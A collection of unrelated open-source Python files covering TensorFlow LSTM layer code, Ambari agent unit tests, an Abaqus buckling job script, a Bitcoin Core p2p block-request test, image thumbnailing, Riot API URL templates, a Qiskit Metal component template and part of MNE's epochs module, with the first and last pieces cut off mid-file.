initializer=None)
bias = tf.get_variable(
"bias_{}".format(index), [output_shape],
dtype=tf.float32,
initializer=None)
self.name_variabel_map["weight_{}".format(index)] = weight
self.name_variabel_map["bias_{}".format(index)] = bias
lstm_cell = rnn.BasicLSTMCell(RNN_HIDDEN_UNITS, forget_bias=1.0)
lstm_cells = rnn.MultiRNNCell([lstm_cell] * RNN_LAYER_NUMBER)
# TODO: Not work for construct sequence input
#x = tf.transpose(input, [1, 0, 2, 3])
# x changes to [32 * BATCH_SIZE, 32 * 3]
x = tf.reshape(input, [-1, 784])
# x changes to array of 32 * [BATCH_SIZE, 32 * 3]
x = tf.split(axis=0, num_or_size_splits=32, value=x)
outputs, states = rnn.static_rnn(lstm_cells, x, dtype=tf.float32)
output = tf.matmul(outputs[-1], weight) + bias
if activation_function == "tanh":
output = tf.nn.tanh(output)
elif activation_function == "relu":
output = tf.nn.relu(output)
elif activation_function == "identity":
output = output
elif activation_function == "sigmoid":
output = tf.nn.sigmoid(output)
else:
output = tf.nn.relu(output)
return output
if __name__ == "__main__":
main()
|
#!/usr/bin/env python2.6
'''
Licensed to the Apache Software Foundation (ASF) under one
or more contributor license agreements. See the NOTICE file
distributed with this work for additional information
regarding copyright ownership. The ASF licenses this file
to you under the Apache License, Version 2.0 (the
"License"); you may not use this file except in compliance
with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
'''
import StringIO
import sys
from ambari_agent import NetUtil, security
from mock.mock import MagicMock, patch, ANY
import unittest
from ambari_agent import ProcessHelper, main
from ambari_agent import ProcessHelper, main
import logging
import signal
from ambari_agent.AmbariConfig import AmbariConfig
import ConfigParser
import os
import tempfile
from ambari_agent.PingPortListener import PingPortListener
from ambari_agent.Controller import Controller
from optparse import OptionParser
from ambari_agent.DataCleaner import DataCleaner
class TestMain(unittest.TestCase):
def setUp(self):
# disable stdout
out = StringIO.StringIO()
sys.stdout = out
def tearDown(self):
# enable stdout
sys.stdout = sys.__stdout__
@patch("os._exit")
@patch("os.getpid")
@patch.object(ProcessHelper, "stopAgent")
def test_signal_handler(self, stopAgent_mock, os_getpid_mock, os_exit_mock):
# testing exit of children
main.agentPid = 4444
os_getpid_mock.return_value = 5555
main.signal_handler("signum", "frame")
self.assertTrue(os_exit_mock.called)
os_exit_mock.reset_mock()
# testing exit of main process
os_getpid_mock.return_value = main.agentPid
main.signal_handler("signum", "frame")
self.assertFalse(os_exit_mock.called)
self.assertTrue(stopAgent_mock.called)
@patch.object(main.logger, "addHandler")
@patch.object(main.logger, "setLevel")
@patch("logging.handlers.RotatingFileHandler")
def test_setup_logging(self, rfh_mock, setLevel_mock, addHandler_mock):
# Testing silent mode
main.setup_logging(False)
self.assertTrue(addHandler_mock.called)
setLevel_mock.assert_called_with(logging.INFO)
addHandler_mock.reset_mock()
setLevel_mock.reset_mock()
# Testing verbose mode
main.setup_logging(True)
self.assertTrue(addHandler_mock.called)
setLevel_mock.assert_called_with(logging.DEBUG)
@patch.object(main.logger, "setLevel")
@patch("logging.basicConfig")
def test_update_log_level(self, basicConfig_mock, setLevel_mock):
config = AmbariConfig().getConfig()
# Testing with default setup (config file does not contain loglevel entry)
# Log level should not be changed
main.update_log_level(config)
self.assertFalse(setLevel_mock.called)
setLevel_mock.reset_mock()
# Testing debug mode
config.set('agent', 'loglevel', 'DEBUG')
main.update_log_level(config)
setLevel_mock.assert_called_with(logging.DEBUG)
setLevel_mock.reset_mock()
# Testing any other mode
config.set('agent', 'loglevel', 'INFO')
main.update_log_level(config)
setLevel_mock.assert_called_with(logging.INFO)
setLevel_mock.reset_mock()
config.set('agent', 'loglevel', 'WRONG')
main.update_log_level(config)
setLevel_mock.assert_called_with(logging.INFO)
@patch("signal.signal")
def test_bind_signal_handlers(self, signal_mock):
main.bind_signal_handlers()
# Check if on SIGINT/SIGTERM agent is configured to terminate
signal_mock.assert_any_call(signal.SIGINT, main.signal_handler)
signal_mock.assert_any_call(signal.SIGTERM, main.signal_handler)
# Check if on SIGUSR1 agent is configured to fall into debug
signal_mock.assert_any_call(signal.SIGUSR1, main.debug)
@patch("os.path.exists")
@patch("ConfigParser.RawConfigParser.read")
def test_resolve_ambari_config(self, read_mock, exists_mock):
# Trying case if conf file exists
exists_mock.return_value = True
main.resolve_ambari_config()
self.assertTrue(read_mock.called)
exists_mock.reset_mock()
read_mock.reset_mock()
# Trying case if conf file does not exist
exists_mock.return_value = False
main.resolve_ambari_config()
self.assertFalse(read_mock.called)
@patch("sys.exit")
@patch("os.path.isfile")
@patch("os.path.isdir")
@patch("hostname.hostname")
def test_perform_prestart_checks(self, hostname_mock, isdir_mock, isfile_mock, exit_mock):
main.config = AmbariConfig().getConfig()
# Check expected hostname test
hostname_mock.return_value = "test.hst"
main.perform_prestart_checks("another.hst")
self.assertTrue(exit_mock.called)
exit_mock.reset_mock()
# Trying case if there is another instance running
isfile_mock.return_value = True
isdir_mock.return_value = True
main.perform_prestart_checks(None)
self.assertTrue(exit_mock.called)
isfile_mock.reset_mock()
isdir_mock.reset_mock()
exit_mock.reset_mock()
# Trying case if agent prefix dir does not exist
isfile_mock.return_value = False
isdir_mock.return_value = False
main.perform_prestart_checks(None)
self.assertTrue(exit_mock.called)
isfile_mock.reset_mock()
isdir_mock.reset_mock()
exit_mock.reset_mock()
# Trying normal case
isfile_mock.return_value = False
isdir_mock.return_value = True
main.perform_prestart_checks(None)
self.assertFalse(exit_mock.called)
@patch("time.sleep")
@patch("os.kill")
@patch("os._exit")
@patch("os.path.exists")
def test_daemonize_and_stop(self, exists_mock, _exit_mock, kill_mock, sleep_mock):
oldpid = ProcessHelper.pidfile
pid = str(os.getpid())
_, tmpoutfile = tempfile.mkstemp()
ProcessHelper.pidfile = tmpoutfile
# Test daemonization
main.daemonize()
saved = open(ProcessHelper.pidfile, 'r').read()
self.assertEqual(pid, saved)
# Reuse pid file when testing agent stop
# Testing normal exit
exists_mock.return_value = False
main.stop_agent()
kill_mock.assert_called_with(int(pid), signal.SIGTERM)
_exit_mock.assert_called_with(0)
# Restore
kill_mock.reset_mock()
_exit_mock.reset_mock()
# Testing exit when failed to remove pid file
exists_mock.return_value = True
main.stop_agent()
kill_mock.assert_any_call(int(pid), signal.SIGTERM)
kill_mock.assert_any_call(int(pid), signal.SIGKILL)
_exit_mock.assert_called_with(1)
# Restore
ProcessHelper.pidfile = oldpid
os.remove(tmpoutfile)
@patch.object(main, "setup_logging")
@patch.object(main, "bind_signal_handlers")
@patch.object(main, "stop_agent")
@patch.object(main, "resolve_ambari_config")
@patch.object(main, "perform_prestart_checks")
@patch.object(main, "daemonize")
@patch.object(main, "update_log_level")
@patch.object(NetUtil.NetUtil, "try_to_connect")
@patch.object(Controller, "__init__")
@patch.object(Controller, "start")
@patch.object(Controller, "join")
@patch("optparse.OptionParser.parse_args")
@patch.object(DataCleaner,"start")
@patch.object(DataCleaner,"__init__")
@patch.object(PingPortListener,"start")
@patch.object(PingPortListener,"__init__")
def test_main(self, ping_port_init_mock, ping_port_start_mock, data_clean_init_mock,data_clean_start_mock,
parse_args_mock, join_mock, start_mock, Controller_init_mock, try_to_connect_mock,
update_log_level_mock, daemonize_mock, perform_prestart_checks_mock,
resolve_ambari_config_mock, stop_mock, bind_signal_handlers_mock, setup_logging_mock):
data_clean_init_mock.return_value = None
Controller_init_mock.return_value = None
ping_port_init_mock.return_value = None
options = MagicMock()
parse_args_mock.return_value = (options, MagicMock)
#testing call without command-line arguments
main.main()
self.assertTrue(setup_logging_mock.called)
self.assertTrue(bind_signal_handlers_mock.called)
self.assertTrue(stop_mock.called)
self.assertTrue(resolve_ambari_config_mock.called)
self.assertTrue(perform_prestart_checks_mock.called)
self.assertTrue(daemonize_mock.called)
self.assertTrue(update_log_level_mock.called)
try_to_connect_mock.assert_called_once_with(ANY, -1, ANY)
self.assertTrue(start_mock.called)
self.assertTrue(data_clean_init_mock.called)
self.assertTrue(data_clean_start_mock.called)
self.assertTrue(ping_port_init_mock.called)
self.assertTrue(ping_port_start_mock.called)
perform_prestart_checks_mock.reset_mock()
# Testing call with --expected-hostname parameter
options.expected_hostname = "test.hst"
main.main()
perform_prestart_checks_mock.assert_called_once_with(options.expected_hostname)
|
#=====================================================================#
#
# Created by M.A. Bessa on 12-Nov-2019 03:54:04
#=====================================================================#
from abaqusConstants import *
from odbAccess import *
import os
import numpy
import collections
#
os.chdir(r'/home/gkus/F3DAS-master/3_Analyses/DOE_Ix-PD-100/Input_point1/Imperfection_point1/DoE_point57')
with open('DoE57_linear_buckle.inp','w') as File:
File.write('** Include file with mesh of structure:\n')
File.write('*INCLUDE, INPUT=include_mesh_DoE57.inp\n')
File.write('** \n')
File.write('** STEP: Step-1\n')
File.write('** \n')
File.write('*Step, name=Step-1\n')
File.write('*Buckle, eigensolver=lanczos\n')
File.write('20, 0., , , \n')
File.write('** \n')
File.write('** BOUNDARY CONDITIONS\n')
File.write('** \n')
File.write('** Name: BC_Zminus Type: Displacement/Rotation\n')
File.write('*Boundary\n')
File.write('RP_ZmYmXm, 1, 6\n')
File.write('** \n')
File.write('** LOADS\n')
File.write('** \n')
File.write('** Name: Applied_Moment Type: Moment\n')
File.write('*Cload\n')
File.write('RP_ZpYmXm, 3, -1.00\n')
File.write('** \n')
File.write('*Node File\n')
File.write('U \n')
File.write('** \n')
File.write('*EL PRINT,FREQUENCY=1\n')
File.write('*NODE PRINT,FREQUENCY=1\n')
File.write('*MODAL FILE\n')
File.write('*OUTPUT,FIELD,VAR=PRESELECT\n')
File.write('*OUTPUT,HISTORY,FREQUENCY=1\n')
File.write('*MODAL OUTPUT\n')
File.write('*End Step\n')
# Create job, run it and wait for completion
inputFile_string = '/home/gkus/F3DAS-master/3_Analyses/DOE_Ix-PD-100/Input_point1/Imperfection_point1/DoE_point57'+'/'+'DoE57_linear_buckle.inp'
job=mdb.JobFromInputFile(name='DoE57_linear_buckle', inputFileName=inputFile_string,
type=ANALYSIS, atTime=None, waitMinutes=0, waitHours=0, queue=None,
memory=90, memoryUnits=PERCENTAGE, getMemoryFromAnalysis=True,
explicitPrecision=SINGLE, nodalOutputPrecision=SINGLE, userSubroutine='',
scratch='', resultsFormat=ODB, parallelizationMethodExplicit=DOMAIN,
numDomains=1, activateLoadBalancing=False, multiprocessingMode=DEFAULT,
numCpus=1)
#
job.submit()
job.waitForCompletion()
#
|
#!/usr/bin/env python2
# Copyright (c) 2015 The Bitcoin Core developers
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
from test_framework.mininode import *
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import *
import logging
'''
In this test we connect to one node over p2p, send it numerous inv's, and
compare the resulting number of getdata requests to a max allowed value. We
test for exceeding 128 blocks in flight, which was the limit an 0.9 client will
reach. [0.10 clients shouldn't request more than 16 from a single peer.]
'''
MAX_REQUESTS = 128
class TestManager(NodeConnCB):
# set up NodeConnCB callbacks, overriding base class
def on_getdata(self, conn, message):
self.log.debug("got getdata %s" % repr(message))
# Log the requests
for inv in message.inv:
if inv.hash not in self.blockReqCounts:
self.blockReqCounts[inv.hash] = 0
self.blockReqCounts[inv.hash] += 1
def on_close(self, conn):
if not self.disconnectOkay:
raise EarlyDisconnectError(0)
def __init__(self):
NodeConnCB.__init__(self)
self.log = logging.getLogger("BlockRelayTest")
def add_new_connection(self, connection):
self.connection = connection
self.blockReqCounts = {}
self.disconnectOkay = False
def run(self):
try:
fail = False
self.connection.rpc.generate(1) # Leave IBD
numBlocksToGenerate = [ 8, 16, 128, 1024 ]
for count in range(len(numBlocksToGenerate)):
current_invs = []
for i in range(numBlocksToGenerate[count]):
current_invs.append(CInv(2, random.randrange(0, 1<<256)))
if len(current_invs) >= 50000:
self.connection.send_message(msg_inv(current_invs))
current_invs = []
if len(current_invs) > 0:
self.connection.send_message(msg_inv(current_invs))
# Wait and see how many blocks were requested
time.sleep(2)
total_requests = 0
with mininode_lock:
for key in self.blockReqCounts:
total_requests += self.blockReqCounts[key]
if self.blockReqCounts[key] > 1:
raise AssertionError("Error, test failed: block %064x requested more than once" % key)
if total_requests > MAX_REQUESTS:
raise AssertionError("Error, too many blocks (%d) requested" % total_requests)
print "Round %d: success (total requests: %d)" % (count, total_requests)
except AssertionError as e:
print "TEST FAILED: ", e.args
self.disconnectOkay = True
self.connection.disconnect_node()
class MaxBlocksInFlightTest(BitcoinTestFramework):
def add_options(self, parser):
parser.add_option("--testbinary", dest="testbinary",
default=os.getenv("BITCOIND", "bitcoind"),
help="Binary to test max block requests behavior")
def setup_chain(self):
print "Initializing test directory "+self.options.tmpdir
initialize_chain_clean(self.options.tmpdir, 1)
def setup_network(self):
self.nodes = start_nodes(1, self.options.tmpdir,
extra_args=[['-debug', '-whitelist=127.0.0.1']],
binary=[self.options.testbinary])
def run_test(self):
test = TestManager()
test.add_new_connection(NodeConn('127.0.0.1', p2p_port(0), self.nodes[0], test))
NetworkThread().start() # Start up network handling in another thread
test.run()
if __name__ == '__main__':
MaxBlocksInFlightTest().main()
|
import os
import time
from PIL import Image, ImageFilter
directory = "images"
image_files = os.listdir(directory)
dir_save = "thumbnails"
t1 = time.perf_counter()
size = (1200, 1200)
for f in image_files:
image = Image.open(os.path.join(directory, f))
image = image.filter(ImageFilter.GaussianBlur(radius=15))
image.thumbnail(size)
image.save(os.path.join(dir_save, f))
print("{} processed.".format(f))
t2 = time.perf_counter()
print("script finished in {:.2f}(s).".format(t2-t1))
|
"""Aprendendo a extrair dados da API da RIOT."""
# 20 requests every 1 seconds(s)
# 100 requests every 2 minutes(s)
URL = {
'base_summoner': 'https://{region}.api.riotgames.com/lol/summoner/{url}',
'base_matchlist': 'https://{region}.api.riotgames.com/lol/match/{url}',
'base_matchPerChamp': 'https://{region}.api.riotgames.com/lol/match/{url}',
'base_match': 'https://{region}.api.riotgames.com/lol/match/{url}',
'base_matchPerqueue': 'https://{region}.api.riotgames.com/lol/match/{url}',
'base_tier': 'https://{region}.api.riotgames.com/lol/league/{url}',
'summoner_by_name': 'v{version}/summoners/by-name/{vars}',
'match_list': 'v{version}/matchlists/by-account/{vars}',
'matchPerChamp': 'v{version}/matchlists/by-account/{vars}?champion={champion}',
'matchPerqueue': 'v{version}/matchlists/by-account/{vars}?queue={queue}',
'match_stats': 'v{version}/matches/{vars}',
'tier': 'v{version}/entries/by-summoner/{vars}'}
API_VERSIONS = {
'summoner': '4'
}
REGION = {
'brazil': 'br1'
}
|
# -*- coding: utf-8 -*-
# This code is part of Qiskit.
#
# (C) Copyright IBM 2017, 2021.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
from qiskit_metal import draw, Dict
from qiskit_metal.qlibrary.core import QComponent
from ... import config
if not config.is_building_docs():
from qiskit_metal import is_true
class MyQComponent(QComponent):
"""
This class is a template
Use this class as a blueprint to put together for your components - have fun
"""
# Edit these to define your own template options for creation
# Default drawing options
default_options = Dict(width='500um',
height='300um',
pos_x='0um',
pos_y='0um',
rotation='0',
layer='1')
"""Default drawing options"""
# Name prefix of component, if user doesn't provide name
component_metadata = Dict(short_name='component')
"""Component metadata"""
def make(self):
"""Convert self.options into QGeometry."""
p = self.parse_options() # Parse the string options into numbers
# EDIT HERE - Replace the following with your code
# Create some raw geometry
# Use autocompletion for the `draw.` module (use tab key)
rect = draw.rectangle(p.width, p.height, p.pos_x, p.pos_y)
rect = draw.rotate(rect, p.rotation)
geom = {'my_polygon': rect}
self.add_qgeometry('poly', geom, layer=p.layer, subtract=False)
|
# -*- coding: utf-8 -*-
"""Tools for working with epoched data."""
# Authors: Alexandre Gramfort <alexandre.gramfort@inria.fr>
# Matti Hämäläinen <msh@nmr.mgh.harvard.edu>
# Daniel Strohmeier <daniel.strohmeier@tu-ilmenau.de>
# Denis Engemann <denis.engemann@gmail.com>
# Mainak Jas <mainak@neuro.hut.fi>
# Stefan Appelhoff <stefan.appelhoff@mailbox.org>
#
# License: BSD-3-Clause
from functools import partial
from collections import Counter
from copy import deepcopy
import json
import operator
import os.path as op
import numpy as np
from .io.utils import _construct_bids_filename
from .io.write import (start_and_end_file, start_block, end_block,
write_int, write_float, write_float_matrix,
write_double_matrix, write_complex_float_matrix,
write_complex_double_matrix, write_id, write_string,
_get_split_size, _NEXT_FILE_BUFFER, INT32_MAX)
from .io.meas_info import (read_meas_info, write_meas_info, _merge_info,
_ensure_infos_match)
from .io.open import fiff_open, _get_next_fname
from .io.tree import dir_tree_find
from .io.tag import read_tag, read_tag_info
from .io.constants import FIFF
from .io.fiff.raw import _get_fname_rep
from .io.pick import (channel_indices_by_type, channel_type,
pick_channels, pick_info, _pick_data_channels,
_DATA_CH_TYPES_SPLIT, _picks_to_idx)
from .io.proj import setup_proj, ProjMixin
from .io.base import BaseRaw, TimeMixin, _get_ch_factors
from .bem import _check_origin
from .evoked import EvokedArray, _check_decim
from .baseline import rescale, _log_rescale, _check_baseline
from .channels.channels import (ContainsMixin, UpdateChannelsMixin,
SetChannelsMixin, InterpolationMixin)
from .filter import detrend, FilterMixin, _check_fun
from .parallel import parallel_func
from .event import (_read_events_fif, make_fixed_length_events,
match_event_names)
from .fixes import rng_uniform
from .viz import (plot_epochs, plot_epochs_psd, plot_epochs_psd_topomap,
plot_epochs_image, plot_topo_image_epochs, plot_drop_log)
from .utils import (_check_fname, check_fname, logger, verbose,
_time_mask, check_random_state, warn, _pl,
sizeof_fmt, SizeMixin, copy_function_doc_to_method_doc,
_check_pandas_installed,
_check_preload, GetEpochsMixin,
_prepare_read_metadata, _prepare_write_metadata,
_check_event_id, _gen_events, _check_option,
_check_combine, ShiftTimeMixin, _build_data_frame,
_check_pandas_index_arguments, _convert_times,
_scale_dataframe_data, _check_time_format, object_size,
_on_missing, _validate_type, _ensure_events,
_path_like, _VerboseDep)
from .utils.docs import fill_doc
from .annotations import (_write_annotations, _read_annotations_fif,
EpochAnnotationsMixin)
def _pack_reject_params(epochs):
reject_params = dict()
for key in ('reject', 'flat', 'reject_tmin', 'reject_tmax'):
val = getattr(epochs, key, None)
if val is not None:
reject_params[key] = val
return reject_params
def _save_split(epochs, fname, part_idx, n_parts, fmt, split_naming,
overwrite):
"""Split epochs.
Anything new added to this function also needs to be added to
BaseEpochs.save to account for new file sizes.
"""
# insert index in filename
base, ext = op.splitext(fname)
if part_idx > 0:
if split_naming == 'neuromag':
fname = '%s-%d%s' % (base, part_idx, ext)
else:
assert split_naming == 'bids'
fname = _construct_bids_filename(base, ext, part_idx,
validate=False)
_check_fname(fname, overwrite=overwrite)
next_fname = None
if part_idx < n_parts - 1:
if split_naming == 'neuromag':
next_fname = '%s-%d%s' % (base, part_idx + 1, ext)
else:
assert split_naming == 'bids'
next_fname = _construct_bids_filename(base, ext, part_idx + 1,
validate=False)
next_idx = part_idx + 1
else:
next_idx = None
with start_and_end_file(fname) as fid:
_save_part(fid, epochs, fmt, n_parts, next_fname, next_idx)
def _save_part(fid, epochs, fmt, n_parts, next_fname, next_idx):
info = epochs.info
meas_id = info['meas_id']
start_block(fid, FIFF.FIFFB_MEAS)
write_id(fid, FIFF.FIFF_BLOCK_ID)
if info['meas_id'] is not None:
write_id(fid, FIFF.FIFF_PARENT_BLOCK_ID, info['meas_id'])
# Write measurement info
write_meas_info(fid, info)
# One or more evoked data sets
start_block(fid, FIFF.FIFFB_PROCESSED_DATA)
start_block(fid, FIFF.FIFFB_MNE_EPOCHS)
# write events out after getting data to ensure bad events are dropped
data = epochs.get_data()
_check_option('fmt', fmt, ['single', 'double'])
if np.iscomplexobj(data):
if fmt == 'single':
write_function = write_complex_float_matrix
elif fmt == 'double':
write_function = write_complex_double_matrix
else:
if fmt == 'single':
write_function = write_float_matrix
elif fmt == 'double':
write_function = write_double_matrix
# Epoch annotations are written if there are any
annotations = getattr(epochs, 'annotations', [])
if annotations is not None and len(annotations):
_write_annotations(fid, annotations)
# write Epoch event windows
start_block(fid, FIFF.FIFFB_MNE_EVENTS)
write_int(fid, FIFF.FIFF_MNE_EVENT_LIST, epochs.events.T)
write_string(fid, FIFF.FIFF_DESCRIPTION, _event_id_string(epochs.event_id))
end_block(fid, FIFF.FIFFB_MNE_EVENTS)
# Metadata
if epochs.metadata is not None:
start_block(fid, FIFF.FIFFB_MNE_METADATA)
metadata = _prepare_write_metadata(epochs.metadata)
write_string(fid, FIFF.FIFF_DESCRIPTION, metadata)
end_block(fid, FIFF.FIFFB_MNE_METADATA)
# First and last sample
first = int(round(epochs.tmin * info['sfreq'])) # round just to be safe
last = first + len(epochs.times) - 1
write_int(fid, FIFF.FIFF_FIRST_SAMPLE, first)
write_int(fid, FIFF.FIFF_LAST_SAMPLE, last)
# write raw original sampling rate
write_float(fid, FIFF.FIFF_MNE_EPOCHS_RAW_SFREQ, epochs._raw_sfreq)
# save baseline
if epochs.baseline is not None:
bmin, bmax = epochs.baseline
write_float(fid, FIFF.FIFF_MNE_BASELINE_MIN, bmin)
write_float(fid, FIFF.FIFF_MNE_BASELINE_MAX, bmax)
# The epochs itself
decal = np.empty(info['nchan'])
for k in range(info['nchan']):
decal[k] = 1.0 / (info['chs'][k]['cal'] *
info['chs'][k].get('scale', 1.0))
data *= decal[np.newaxis, :, np.newaxis]
write_function(fid, FIFF.FIFF_EPOCH, data)
# undo modifications to data
data /= decal[np.newaxis, :, np.newaxis]
write_string(fid, FIFF.FIFF_MNE_EPOCHS_DROP_LOG,
json.dumps(epochs.drop_log))
reject_params = _pack_reject_params(epochs)
if reject_params:
write_string(fid, FIFF.FIFF_MNE_EPOCHS_REJECT_FLAT,
json.dumps(reject_params))
write_int(fid, FIFF.FIFF_MNE_EPOCHS_SELECTION,
epochs.selection)
# And now write the next file info in case epochs are split on disk
if next_fname is not None and n_parts > 1:
start_block(fid, FIFF.FIFFB_REF)
write_int(fid, FIFF.FIFF_REF_ROLE, FIFF.FIFFV_ROLE_NEXT_FILE)
write_string(fid, FIFF.FIFF_REF_FILE_NAME, op.basename(next_fname))
if meas_id is not None:
write_id(fid, FIFF.FIFF_REF_FILE_ID, meas_id)
write_int(fid, FIFF.FIFF_REF_FILE_NUM, next_idx)
end_block(fid, FIFF.FIFFB_REF)
end_block(fid, FIFF.FIFFB_MNE_EPOCHS)
end_block(fid, FIFF.FIFFB_PROCESSED_DATA)
end_block(fid, FIFF.FIFFB_MEAS)
def _event_id_string(event_id):
return ';'.join([k + ':' + str(v) for k, v in event_id.items()])
def _merge_events(events, event_id, selection):
"""Merge repeated events."""
event_id = event_id.copy()
new_events = events.copy()
event_idxs_to_delete = list()
unique_events, counts = np.unique(events[:, 0], return_counts=True)
for ev in unique_events[counts > 1]:
# indices at which the non-unique events happened
idxs = (events[:, 0] == ev).nonzero()[0]
# Figure out new value for events[:, 1]. Set to 0, if mixed vals exist
unique_priors = np.unique(events[idxs, 1])
new_prior = unique_priors[0] if len(unique_priors) == 1 else 0
# If duplicate time samples have same event val, "merge" == "drop"
# and no new event_id key will be created
ev_vals = np.unique(events[idxs, 2])
if len(ev_vals) <= 1:
new_event_val = ev_vals[0]
# Else, make a new event_id for the merged event
else:
# Find all event_id keys involved in duplicated events. These
# keys will be merged to become a new entry in "event_id"
event_id_keys = list(event_id.keys())
event_id_vals = list(event_id.values())
new_key_comps = [event_id_keys[event_id_vals.index(value)]
for value in ev_vals]
# Check if we already have an entry for merged keys of duplicate
# events ... if yes, reuse it
for key in event_id:
if set(key.split('/')) == set(new_key_comps):
new_event_val = event_id[key]
break
# Else, find an unused value for the new key and make an entry into
# the event_id dict
else:
ev_vals = np.unique(
np.concatenate((list(event_id.values()),
events[:, 1:].flatten()),
axis=0))
if ev_vals[0] > 1:
new_event_val = 1
else:
diffs = np.diff(ev_vals)
idx = np.where(diffs > 1)[0]
idx = -1 if len(idx) == 0 else idx[0]
new_event_val = ev_vals[idx] + 1
new_event_id_key = '/'.join(sorted(new_key_comps))
event_id[new_event_id_key] = int(new_event_val)
# Replace duplicate event times with merged event and remember which
# duplicate indices to delete later
new_events[idxs[0], 1] = new_prior
new_events[idxs[0], 2] = new_event_val
event_idxs_to_delete.extend(idxs[1:])
# Delete duplicate event idxs
new_events = np.delete(new_events, event_idxs_to_delete, 0)
new_selection = np.delete(selection, event_idxs_to_delete, 0)
return new_events, event_id, new_selection
def _handle_event_repeated(events, event_id, event_repeated, selection,
drop_log):
"""Handle repeated events.
Note that drop_log will be modified inplace
"""
assert len(events) == len(selection)
selection = np.asarray(selection)
unique_events, u_ev_idxs = np.unique(events[:, 0], return_index=True)
# Return early if no duplicates
if len(unique_events) == len(events):
return events, event_id, selection, drop_log
# Else, we have duplicates. Triage ...
_check_option('event_repeated', event_repeated, ['error', 'drop', 'merge'])
drop_log = list(drop_log)
if event_repeated == 'error':
raise RuntimeError('Event time samples were not unique. Consider '
'setting the `event_repeated` parameter."')
elif event_repeated == 'drop':
logger.info('Multiple event values for single event times found. '
'Keeping the first occurrence and dropping all others.')
new_events = events[u_ev_idxs]
new_selection = selection[u_ev_idxs]
drop_ev_idxs = np.setdiff1d(selection, new_selection)
for idx in drop_ev_idxs:
drop_log[idx] = drop_log[idx] + ('DROP DUPLICATE',)
selection = new_selection
elif event_repeated == 'merge':
logger.info('Multiple event values for single event times found. '
'Creating new event value to reflect simultaneous events.')
new_events, event_id, new_selection = \
_merge_events(events, event_id, selection)
drop_ev_idxs = np.setdiff1d(selection, new_selection)
for idx in drop_ev_idxs:
drop_log[idx] = drop_log[idx] + ('MERGE DUPLICATE',)
selection = new_selection
drop_log = tuple(drop_log)
# Remove obsolete kv-pairs from event_id after handling
keys = new_events[:, 1:].flatten()
event_id = {k: v for k, v in event_id.items() if v in keys}
return new_events, event_id, selection, drop_log
@fill_doc
class BaseEpochs(ProjMixin, ContainsMixin, UpdateChannelsMixin, ShiftTimeMixin,
SetChannelsMixin, InterpolationMixin, FilterMixin,
TimeMixin, SizeMixin, GetEpochsMixin, EpochAnnotationsMixin,
_VerboseDep):
"""Abstract base class for `~mne.Epochs`-type classes.
.. warning:: This class provides basic functionality and should never be
instantiated directly.
Parameters
----------
%(info_not_none)s
data : ndarray | None
If ``None``, data will be read from the Raw object. If ndarray, must be
of shape (n_epochs, n_channels, n_times).
%(events_epochs)s
%(event_id)s
%(epochs_tmin_tmax)s
%(baseline_epochs)s
Defaults to ``(None, 0)``, i.e. beginning of the the data until
time point zero.
%(epochs_raw)s
%(picks_all)s
%(reject_epochs)s
%(flat)s
%(decim)s
%(epochs_reject_tmin_tmax)s
%(epochs_detrend)s
%(proj_epochs)s
%(epochs_on_missing)s
preload_at_end : bool
%(epochs_preload)s
selection : iterable | None
Iterable of indices of selected epochs. If ``None``, will be
automatically generated, corresponding to all non-zero events.
drop_log : tuple | None
Tuple of tuple of strings indicating which epochs have been marked to
be ignored.
filename : str | None
The filename (if the epochs are read from disk).
%(epochs_metadata)s
%(epochs_event_repeated)s
%(verbose)s
raw_sfreq : float
The original Raw object sampling rate. If None, then it is set to
``info['sfreq']``.
annotations : instance of mne.Annotations | None
Annotations to set.
Notes
-----
The ``BaseEpochs`` class is public to allow for stable type-checking in
user code (i.e., ``isinstance(my_epochs, BaseEpochs)``) but should not be
used as a constructor for Epochs objects (use instead :class:`mne.Epochs`).
"""
@verbose
def __init__(self, info, data, events, event_id=None,
tmin=-0.2, tmax=0.5,
baseline=(None, 0), raw=None, picks=None, reject=None,
flat=None, decim=1, reject_tmin=None, reject_tmax=None,
detrend=None, proj=True, on_missing='raise',
preload_at_end=False, selection=None, drop_log=None,
filename=None, metadata=None, event_repeated='error',
*, verbose=None, raw_sfreq=None,
annotations=None): # noqa: D102
if events is not None: # RtEpochs can have events=None
events = _ensure_events(events)
events_max = events.max()
if events_max > INT32_MAX:
raise ValueError(
f'events array values must not exceed {INT32_MAX}, '
f'got {events_max}')
event_id = _check_event_id(event_id, events)
self.event_id = event_id
del event_id
if events is not None: # RtEpochs can have events=None
for key, val in self.event_id.items():
if val not in events[:, 2]:
msg = ('No matching events found for %s '
'(event id %i)' % (key, val))
_on_missing(on_missing, msg)
# ensure metadata matches original events size
self.selection = np.arange(len(events))
self.events = events
# same as self.metadata = metadata, but suppress log in favor
# of logging below (after setting self.selection)
GetEpochsMixin.metadata.fset(self, metadata, verbose=False)
del events
values = list(self.event_id.values())
selected = np.where(np.in1d(self.events[:, 2], values))[0]
if selection is None:
selection = selected
else:
selection = np.array(selection, int)
if selection.shape != (len(selected),):
raise ValueError('selection must be shape %s got shape %s'
% (selected.shape, selection.shape))
self.selection = selection
if drop_log is None:
self.drop_log = tuple(
() if k in self.selection else ('IGNORED',)
for k in range(max(len(self.events),
max(self.selection) + 1)))
else:
self.drop_log = drop_log
self.events = self.events[selected]
self.events, self.event_id, self.selection, self.drop_log = \
_handle_event_repeated(
self.events, self.event_id, event_repeated,
self.selection, self.drop_log)
# then subselect
sub = np.where(np.in1d(selection, self.selection))[0]
if isinstance(metadata, list):
metadata = [metadata[s] for s in sub]
elif metadata is not None:
metadata = metadata.iloc[sub]
# Remove temporarily set metadata from above, and set
# again to get the correct log ("adding metadata", instead of
# "replacing existing metadata")
GetEpochsMixin.metadata.fset(self, None, verbose=False)
self.metadata = metadata
del metadata
n_events = len(self.events)
if n_events > 1:
if np.diff(self.events.astype(np.int64)[:, 0]).min() <= 0:
warn('The events passed to the Epochs constructor are not '
